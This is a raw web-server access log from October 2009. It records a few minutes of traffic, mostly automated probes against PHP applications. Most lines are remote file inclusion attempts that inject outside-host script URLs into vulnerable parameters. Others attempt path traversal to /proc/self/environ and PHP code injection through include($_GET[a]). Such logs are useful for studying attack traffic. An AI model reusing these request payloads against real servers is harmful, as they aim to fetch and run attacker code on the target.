69.162.74.91 - - [06/Oct/2009:01:52:45 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:45 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:45 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:47 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:51 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:51 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:51 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:51 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:52 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:52 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:52 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:52 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:52:55 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:53:01 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:01:53:14 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
174.143.3.188 - - [06/Oct/2009:01:53:14 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [06/Oct/2009:01:53:14 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [06/Oct/2009:01:53:14 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Advanced Browser (http://www.avantbrowser.com)"
64.27.9.117 - - [06/Oct/2009:01:53:34 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:53:34 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:53:34 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:53:38 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:51 -0400] "GET //////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:51 -0400] "GET /logs/access_log.Q109052800%20%20//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:51 -0400] "GET /logs/access_log.Q109053100%20%20//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:51 -0400] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 200 20723 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:53 -0400] "GET //////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:53 -0400] "GET /logs/access_log.Q109052800%20%20//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:53 -0400] "GET /logs/access_log.Q109053100%20%20//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:53:53 -0400] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 200 20723 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:54:16 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:54:16 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:54:16 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:54:16 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:55:23 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:55:29 -0400] "GET /logs/access_log.Q109092200/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:55:33 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:41 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:41 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:55:43 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:55:48 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:55:48 -0400] "GET /logs/access_log.Q109092200/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:51 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:51 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:58 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:58 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:55:58 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:56:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.27.9.117 - - [06/Oct/2009:01:56:27 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:56:29 -0400] "GET /logs/access_log.Q109052800//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:56:29 -0400] "GET /logs/access_log.Q109053100//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:56:35 -0400] "GET /logs/access_log.Q109092200/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:56:36 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:56:42 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:56:45 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:56:51 -0400] "GET /logs/access_log.Q109052800//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:01:56:51 -0400] "GET /logs/access_log.Q109053100//////?_SERVER[DOCUMENT_ROOT]=http://pseuc0de.fileave.com/zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:57:08 -0400] "GET /logs/access_log.Q109092200/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:57:08 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:57:14 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
204.11.17.16 - - [06/Oct/2009:01:57:33 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dcpeek.com/perl_calendar/docs//tools/story.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.242.37.212 - - [06/Oct/2009:01:57:47 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:57:47 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:57:47 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:57:48 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
92.139.172.72 - - [06/Oct/2009:01:57:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:01:57:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:01:57:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:01:57:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
69.162.74.91 - - [06/Oct/2009:01:57:57 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:58:02 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:58:05 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:58:12 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:58:13 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
207.58.164.77 - - [06/Oct/2009:01:58:19 -0400] "GET /index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:58:19 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
207.58.164.77 - - [06/Oct/2009:01:58:22 -0400] "GET /logs/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
207.58.164.77 - - [06/Oct/2009:01:58:23 -0400] "GET /logs/error_log.Q109062300/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
207.58.164.77 - - [06/Oct/2009:01:58:23 -0400] "GET /logs/access_log.Q109062300/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:58:24 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:58:24 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:58:24 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:58:35 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:58:35 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:58:35 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:59:10 -0400] "GET /logs/access_log.Q109080800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:59:36 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:59:36 -0400] "GET /logs/error_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.11.17.16 - - [06/Oct/2009:01:59:44 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dcpeek.com/perl_calendar/docs//tools/story.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
204.11.17.16 - - [06/Oct/2009:01:59:44 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dcpeek.com/perl_calendar/docs//tools/story.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
204.11.17.16 - - [06/Oct/2009:01:59:44 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dcpeek.com/perl_calendar/docs//tools/story.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:12 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:12 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /logs/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /logs/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:13 -0400] "GET /logs/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:29 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:29 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:00:29 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.186.64.229 - - [06/Oct/2009:02:00:51 -0400] "GET /logs/access_log.Q109053000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:02:00:51 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:02:00:52 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
